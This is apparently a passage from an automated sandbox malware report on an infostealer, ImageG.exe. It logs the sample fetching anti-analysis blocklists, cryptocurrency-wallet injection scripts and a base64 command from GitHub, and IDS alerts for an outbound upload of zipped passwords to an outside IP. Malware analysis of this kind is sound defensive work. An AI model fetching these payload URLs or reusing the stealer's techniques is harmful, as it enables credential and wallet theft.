        Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, File opened: C:\Users\user
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, File opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, File opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, File opened: C:\Users\user\AppData\Local\Temp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, File opened: C:\Users\user\AppData
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, File opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\resources
        Source: chrome.exe, Memory has grown: Private usage: 16MB later: 32MB

        Networking

        Source: Network traffic, Suricata IDS: 2029846 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) : 192.168.11.20:61018 -> 94.139.32.29:443
        Source: Network traffic, Suricata IDS: 2035015 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2 : 192.168.11.20:61018 -> 94.139.32.29:443
        Source: Network traffic, Suricata IDS: 2035016 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2 : 192.168.11.20:61018 -> 94.139.32.29:443
        Source: DNS query: nova-blight.xyz
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, HTTP traffic: GET / HTTP/1.1 Accept: application/json, text/plain, */* User-Agent: axios/0.27.2 Host: www.google.com Connection: close
        Source: global traffic, HTTP traffic detected: GET /472b3c.jpg HTTP/1.1 Host: i.imgflip.com Connection: Keep-Alive
        Source: Joe Sandbox View, IP Address: 140.82.113.3 140.82.113.3
        Source: Joe Sandbox View, IP Address: 76.223.105.230 76.223.105.230
        Source: Joe Sandbox View, IP Address: 208.91.197.27 208.91.197.27
        Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown, TCP traffic detected without corresponding DNS query: 23.1.33.210
        Source: unknown, TCP traffic detected without corresponding DNS query: 172.217.215.94
        Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: ipinfo.ioConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blockedOS.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_ips.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blockedpcname.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_GPUTYPE.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_progr.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_hwid.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/nope.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global traffic
        HTTP traffic detected: GET /servers HTTP/1.1
            Accept: */*
            accept-language: en-US,en;
            cache-control: no-cache
            pragma: no-cache
            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
            Host: api.gofile.io
            Connection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/exodus-inject.js HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/atomic-main.js HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/base64cmd HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/badusb/raw/main/extensions.zip HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: github.comConnection: close
        Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Accept: */*accept-language: en-US,en;cache-control: no-cachepragma: no-cacheuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Host: api.gofile.ioConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/badusb/main/extensions.zip HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/vendors.38d37a062dc15af21957.js HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /0x7z1337/gfijfgjgfjfgifgifg/raw/refs/heads/main/ImageG.exe HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: github.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
Source: global traffic
HTTP traffic detected:
    GET /0x7z1337/gfijfgjgfjfgifgifg/refs/heads/main/ImageG.exe HTTP/1.1
    Accept: application/json, text/plain, */*
    User-Agent: axios/0.27.2
    Host: raw.githubusercontent.com
    Connection: close

Source: global traffic
HTTP traffic detected:
    GET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1
    Host: ntp.msn.com
    Connection: keep-alive
    sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
    Device-Memory: 8
    sec-ch-ua-model:
    rtt: 150
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
    sec-ch-ua-arch: "x86"
    sec-ch-ua-platform-version: "10.0.0"
    sec-ch-ua-full-version: "94.0.992.31"
    Accept: */*
    downlink: 9.85
    sec-ch-ua-bitness: "64"
    ect: 4g
    sec-ch-prefers-color-scheme: light
    sec-ch-ua-platform: "Windows"
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; pglt-edgeChromium-ntp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; USRLOC=; MUID=254698E11FC6656435158D511ED164B7; MUIDB=254698E11FC6656435158D511ED164B7; _EDGE_S=F=1&SID=30A93CC630BE621C02C429763108637F; _EDGE_V=1; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; MicrosoftApplicationsTelemetryDeviceId=d89f1976-d7ca-4e02-b76b-e44b0670b02e; msnup=%7B%22cnex%22%3A%22no%22%7D; ai_session=B6TiXGWRymNln17HlQ0PSH|1742066834916|1742066834916

Source: global traffic
HTTP traffic detected:
    GET / HTTP/1.1
    Accept: application/json, text/plain, */*
    User-Agent: axios/0.27.2
    Host: www.google.com
    Connection: close
Source: unknown
HTTP traffic detected:
    POST /dns-query HTTP/1.1
    Host: chrome.cloudflare-dns.com
    Connection: keep-alive
    Content-Length: 128
    Accept: application/dns-message
    Accept-Language: *
    User-Agent: Chrome
    Accept-Encoding: identity
    Content-Type: application/dns-message

Source: global traffic
TCP traffic: 192.168.11.20:61415 -> 239.255.255.250:1900
Source: global traffic
TCP traffic: 192.168.11.20:53348 -> 239.255.255.250:1900
Source: global traffic
HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Cache-Control: max-age=30
    Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com
    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
    Content-Type: text/html;charset=utf-8
    Vary: Accept-Encoding
    Server: DPS/2.0.0+sha-f393f2a
    X-Version: f393f2a
    X-SiteId: us-east-1
    Set-Cookie: dps_site_id=us-east-1; path=/; secure
    Date: Sat, 15 Mar 2025 19:27:01 GMT
    Connection: close
    Transfer-Encoding: chunked

Source: global traffic
HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Sat, 15 Mar 2025 19:27:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4511
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: max-age=15
    Expires: Sat, 15 Mar 2025 19:27:16 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FofoO5LkoDrqWwDUyd2OTjULGdzM5E9z2JE6c5v0CqKLr73u5tIm%2BBiFQQiYAveUCY%2F%2FP6oQ%2F15hQJ2%2FJjamACOoT6JCFQMsmHZncQQ4oQ8R1aPqdhhiiVM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 920e67e468a41d72-ATL
    server-timing: cfL4;desc="?proto=TCP&rtt=117610&min_rtt=117520&rtt_var=24925&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2800&recv_bytes=5028&delivery_rate=34279&cwnd=252&unsent_bytes=0&cid=98bcb4b2a8e2676c&ts=267&x=0"

Source: global traffic
HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Sat, 15 Mar 2025 19:27:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4511
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: max-age=15
    Expires: Sat, 15 Mar 2025 19:27:16 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFLHN4yEDGN3WbICK0t7wWLmGOvoib%2FqIc79z9W3RHUcSx47WDnTjlDmGnpr7SYLdaFJiZ82rEyz0kPE1Imwh1Y7toVR1Hd7iXB6OUrW9dOq2V2c%2FyWfIk8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 920e67e54b071373-ATL
    server-timing: cfL4;desc="?proto=TCP&rtt=117877&min_rtt=117674&rtt_var=25128&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2800&recv_bytes=1497&delivery_rate=34134&cwnd=252&unsent_bytes=0&cid=fe64c25cafaf955f&ts=295&x=0"

Source: global traffic
HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Sat, 15 Mar 2025 19:27:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4511
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: max-age=15
    Expires: Sat, 15 Mar 2025 19:27:16 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJfXHDxZ5Xd4kwlKIqyAHnm4iePnIrZb%2BRuJBC%2Bl3grhheUg6X0by8HKjmWnThsRzFvtyq%2FVAz4kmGGmurGF3rG2WfiXzLgA9ZfwQEGZ4D6o0V8vEy0QjoY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 920e67e54de7ed7f-ATL
    server-timing: cfL4;desc="?proto=TCP&rtt=117625&min_rtt=117585&rtt_var=24880&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2801&recv_bytes=1002&delivery_rate=34258&cwnd=252&unsent_bytes=0&cid=706d7f7eea958cf4&ts=292&x=0"

Source: global traffic
HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Sat, 15 Mar 2025 19:27:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4511
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: max-age=15
    Expires: Sat, 15 Mar 2025 19:27:16 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5j3HY3WZwOFIqAz%2FWp%2BXRLM05TOFFn2OfP5f0eZ1Bn2ygeq7PL2neIgDu%2FNzEyZZnlTWeBUoXwtsvQifVLcd0ks7mxvG2DMG68%2FQ1N5UhtCnNuB8suvLheE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 920e67e54dc8b02b-ATL
    server-timing: cfL4;desc="?proto=TCP&rtt=117919&min_rtt=117900&rtt_var=24899&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2800&recv_bytes=818&delivery_rate=34229&cwnd=252&unsent_bytes=0&cid=eb9574710c42c2d1&ts=293&x=0"
Source: global traffic
HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    content-length: 93
    cache-control: no-cache
    content-type: text/html
    connection: close
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52570
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58430
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57341
        Source: unknownNetwork traffic detected: HTTP traffic on port 52334 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58419 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58377 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 58383 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60378 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58436
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58435
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52334
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58438
        Source: unknownNetwork traffic detected: HTTP traffic on port 58409 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58437
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60873
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62812
        Source: unknownNetwork traffic detected: HTTP traffic on port 58431 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64795
        Source: unknownNetwork traffic detected: HTTP traffic on port 58414 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 65238 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58437 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58399 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58420 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
        Source: unknownNetwork traffic detected: HTTP traffic on port 64272 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58388 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60089
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60086
        Source: unknownNetwork traffic detected: HTTP traffic on port 58394 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52286 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62941
        Source: unknownNetwork traffic detected: HTTP traffic on port 52567 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50696
        Source: unknownNetwork traffic detected: HTTP traffic on port 58423 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54140
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60378
        Source: unknownNetwork traffic detected: HTTP traffic on port 58389 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58400 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59151
        Source: unknownNetwork traffic detected: HTTP traffic on port 61577 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 63156 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53074 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58372 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 52287 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58429 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62568
        Source: unknownNetwork traffic detected: HTTP traffic on port 62370 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59106 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 60086 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58373 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58405 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49598 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52896
        Source: unknownNetwork traffic detected: HTTP traffic on port 61691 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58401
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58400
        Source: unknownNetwork traffic detected: HTTP traffic on port 58911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53074
        Source: unknownNetwork traffic detected: HTTP traffic on port 58418 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62332
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58435 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 58384 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58407
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58406
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58409
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58408
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58403
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58402
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58405
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58404
        Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61017
        Source: unknownNetwork traffic detected: HTTP traffic on port 58390 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58410
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58411
        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54140 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58430 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61253
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62104
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50414
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58379 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 65009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62104 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59106
        Source: unknownNetwork traffic detected: HTTP traffic on port 58407 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58019
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60576
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58388
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58387
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55430
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58389
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58384
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58383
        Source: unknownNetwork traffic detected: HTTP traffic on port 62941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58385 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58386
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58385
        Source: unknownNetwork traffic detected: HTTP traffic on port 58391 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58380
        Source: unknownNetwork traffic detected: HTTP traffic on port 58731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58382
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58381
        Source: unknownNetwork traffic detected: HTTP traffic on port 58416 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58433 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62568 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64272
        Source: unknownNetwork traffic detected: HTTP traffic on port 55419 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52960
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52286
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52287
        Source: unknownNetwork traffic detected: HTTP traffic on port 58422 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 61750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58399
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58398
        Source: unknownNetwork traffic detected: HTTP traffic on port 58401 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58394
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58397
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58391
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58390
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58393
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58392
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 63379 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65238
        Source: unknownNetwork traffic detected: HTTP traffic on port 58411 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65375
        Source: unknownNetwork traffic detected: HTTP traffic on port 55430 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58428 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58397 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65009
        Source: unknownNetwork traffic detected: HTTP traffic on port 60089 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49598
        Source: unknownNetwork traffic detected: HTTP traffic on port 58380 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58374 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58406 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58731
        Source: unknownNetwork traffic detected: HTTP traffic on port 57341 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61691
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61577
        Source: unknownNetwork traffic detected: HTTP traffic on port 58417 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58434 -> 443
        Source: unknownHTTPS traffic detected: 104.16.40.101:443 -> 192.168.11.20:49771 version: TLS 1.2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: powershell.exeProcess created: 60
        Source: reg.exeProcess created: 53
        Source: conhost.exeProcess created: 71
        Source: cmd.exeProcess created: 78

        System Summary

